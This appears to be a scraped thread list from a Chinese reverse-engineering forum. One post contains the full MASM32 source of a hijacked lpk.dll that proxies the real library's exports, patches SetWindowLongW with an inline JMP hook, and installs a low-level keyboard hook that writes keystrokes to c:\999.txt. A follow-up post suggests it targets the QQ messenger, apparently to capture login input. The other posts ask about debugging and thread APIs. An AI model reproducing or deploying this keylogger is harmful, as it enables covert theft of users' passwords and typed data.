|
怎么获取DbgkDebugObjectType地址
无解吗???? |
|
DLL劫持错在那里
.386 .model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include 文件定义 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> kbdllhook struct vkCode DWORD ?; scanCode DWORD ?; flags DWORD ?; time DWORD ?; dwExtraInfo DWORD ?; kbdllhook ends .data hInstance dd ? szLpk db 'C:\WINDOWS\system32\lpk.dll',0 szLpkEditControl db 'LpkEditControl',0 lpLpkInitialize db 'LpkInitialize',0 lpLpkTabbedTextOut db 'LpkTabbedTextOut',0 lpLpkDllInitialize db 'LpkDllInitialize',0 lpLpkDrawTextEx db 'LpkDrawTextEx',0 lpLpkEditControl db 'LpkEditControl',0 lpLpkExtTextOut db 'LpkExtTextOut',0 lpLpkGetCharacterPlacement db 'LpkGetCharacterPlacement',0 lpLpkGetTextExtentExPoint db 'LpkGetTextExtentExPoint',0 lpLpkPSMTextOut db 'LpkPSMTextOut',0 lpLpkUseGDIWidthCache db 'LpkUseGDIWidthCache',0 lpftsWordBreak db 'ftsWordBreak',0 szCx db 'c:\999.txt',0 szX db '%c',0 szY db '%x',0 szSetWindowsHookExA db 'SetWindowsHookExA',0 dwSetWindowsHookExA dd ? lpSetWindowLongW db 'SetWindowLongW',0 dwSetWindowLongW dd ? szLoadLibrary db 'LoadLibraryA',0 szKernel32 db 'kernel32',0 szUser32 db 'user32',0 dwUser32 dd ? szCreateWindowExA db 'CreateWindowExA',0 szSetWindowLongA db 'SetWindowLongW',0 szGetActiveWindow db 'GetActiveWindow',0 dwGetActiveWindow dd ? dwkeybd_event db 'keybd_event',0 szSetWindowsHookExW db 'SetWindowsHookExW',0 szSetTimer db 'SetTimer',0 .data? hWnd dd ? hHook dd ? dwMessage dd ? szAscii db 4 dup (?) dwLpk dd ? hFile dd ? dwId dd ? szFu1 db 255 dup (?),0 dwNubla dd ? dwProcAddress dd ? hEvent dd ? lpProc dd ? lpProc1 dd ? hHook1 dd ? dwEvent1 dd ? ppp db 5 dup (?) ggg dd ? dwProcLong dd ? dwMk1 db 6 dup (?) kl1 dd ? hEvent1 dd ? hHook2 dd ? dwStimer dd ? v1 dd ? n1 dd ? y1 dd ? 
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; dll 的入口函数 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 键盘钩子回调函数 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _HookProc proc _dwCode,_wParam,_lParam local @szKeyState[256]:byte .if _dwCode == HC_ACTION mov eax,_lParam mov ecx,[eax+10h] mov ebx,_lParam assume ebx:ptr kbdllhook .if _wParam ==100h && [ebx].flags !=10h && [ebx].flags!=90h invoke GetActiveWindow invoke GetWindowLongW,eax,GWL_STYLE .if eax ==14c00020h .if !hFile invoke CreateFile,addr szCx,GENERIC_WRITE or GENERIC_READ ,FILE_SHARE_DELETE or FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov hFile,eax .endif invoke wsprintf,addr szFu1,addr szX,[ebx].vkCode invoke lstrlen,addr szFu1 invoke WriteFile,hFile,addr szFu1,eax,addr n1,0 ;invoke GetLastError ;invoke wsprintf,addr szFu1,addr szX,eax .endif .endif .endif invoke UnhookWindowsHookEx,hHook xor eax,eax ret _HookProc endp _SetTimer proc invoke GetModuleHandle,0 invoke SetWindowsHookExW,WH_KEYBOARD_LL,addr _HookProc,eax,0 mov hHook,eax ret _SetTimer endp _dwProcLong proc xca db 6 dup (?) pushad mov eax,[ebp+0ch] .if eax ==100h .elseif eax ==WM_TIMER invoke KillTimer,DWORD ptr [ebp+08h],DWORD ptr [ebp+10h] .endif popad mov eax,y1 add eax,6 jmp eax _dwProcLong endp _SetWindowLongW proc k1 db 5 dup (?) 
mov eax,dwSetWindowLongW add eax,5 pushad invoke GetWindowLongW,DWORD ptr [ebp+8],GWL_STYLE .if eax ==14c00020h && DWORD ptr [ebp+0ch]== -4 invoke GetActiveWindow invoke GetWindowLongW,eax,GWL_WNDPROC .if eax .if eax <[ebp+10h] mov eax,[ebp+10h] .endif mov y1,eax ;invoke wsprintf,addr szFu1,addr szY,y1;y1 ;invoke SendMessage,2623474,WM_SETTEXT,0,addr szFu1 .if !dwStimer invoke SetTimer,0,0,100,addr _SetTimer mov dwStimer,eax .endif mov eax,y1 push ecx invoke VirtualProtect,eax,10,PAGE_READWRITE,esp pop ecx mov eax,y1 .if BYTE ptr [eax] !=0e9h mov esi,eax lea edi,xca mov ecx,6 rep movsb lea ecx,_dwProcLong sub ecx,eax sub ecx,5 mov BYTE ptr [eax],0e9h mov [eax+1],ecx .endif .endif .endif popad jmp eax _SetWindowLongW endp LpkInitialize proc invoke GetProcAddress,dwLpk,addr lpLpkInitialize jmp eax LpkInitialize endp LpkTabbedTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkTabbedTextOut jmp eax LpkTabbedTextOut endp LpkDllInitialize proc invoke GetProcAddress,dwLpk,addr lpLpkDllInitialize jmp eax LpkDllInitialize endp LpkDrawTextEx proc invoke GetProcAddress,dwLpk,addr lpLpkDrawTextEx jmp eax LpkDrawTextEx endp LpkEditControl proc dd 16 dup (?) 
LpkEditControl endp LpkExtTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkExtTextOut jmp eax LpkExtTextOut endp LpkGetCharacterPlacement proc invoke GetProcAddress,dwLpk,addr lpLpkGetCharacterPlacement jmp eax LpkGetCharacterPlacement endp LpkGetTextExtentExPoint proc invoke GetProcAddress,dwLpk,addr lpLpkGetTextExtentExPoint jmp eax LpkGetTextExtentExPoint endp LpkPSMTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkPSMTextOut jmp eax LpkPSMTextOut endp LpkUseGDIWidthCache proc invoke GetProcAddress,dwLpk,addr lpLpkUseGDIWidthCache jmp eax LpkUseGDIWidthCache endp ftsWordBreak proc invoke GetProcAddress,dwLpk,addr lpftsWordBreak jmp eax ftsWordBreak endp DllEntry1 proc _hInstance,_dwReason,_dwReserved pushad mov ecx,40h push ecx invoke VirtualProtect,addr LpkEditControl,ecx,PAGE_READWRITE,esp pop ecx invoke LoadLibrary,addr szLpk mov dwLpk,eax invoke GetProcAddress,dwLpk,addr szLpkEditControl mov esi,eax lea edi,LpkEditControl mov ecx,40h rep movsb invoke LoadLibrary,addr szUser32 mov dwUser32,eax invoke GetProcAddress,dwUser32,addr szSetWindowLongA mov dwSetWindowLongW,eax push ecx invoke VirtualProtect,dwSetWindowLongW,10,PAGE_READWRITE,esp pop ecx mov eax,dwSetWindowLongW .if BYTE ptr [eax]!=0e9h push ecx invoke VirtualProtect,_SetWindowLongW,10,PAGE_READWRITE,esp pop ecx mov esi,dwSetWindowLongW lea edi,k1 mov ecx,5 rep movsb mov eax,dwSetWindowLongW mov ecx,offset _SetWindowLongW sub ecx,eax sub ecx,5 mov BYTE ptr [eax],0e9h mov [eax+1],ecx .endif push ecx invoke VirtualProtect,_dwProcLong,10,PAGE_READWRITE,esp pop ecx popad or eax,1 ret DllEntry1 Endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> End DllEntry1 |
|
DLL劫持错在那里
HOOK QQ时他掉线了 |
|
[求助]WH_JOURNALRECORD钩子,为什么不执行回调函数?
好像是驱动精灵的驱动搞的鬼 |
|
劫持LPK的问题
谢谢大家这个问题已解决 |
|
|
|
ZwOpenThread怎么用
要传入立即数的是哪个参数啊!大哥出来帮帮忙啊! |
|
ZwOpenThread怎么用
我这个全局变量的! |
|
ZwOpenThread怎么用
大哥新手不会用宏,你用Win32汇编的格式给我示范一遍!帮帮忙我找了一天的资料了!除了汇编会一点其它的语言看不懂! |
|
DebugActiveProcess返回5
谢谢!用 调试权限被清零 的确找到少! |
|
DebugActiveProcess返回5
没人知道吗! |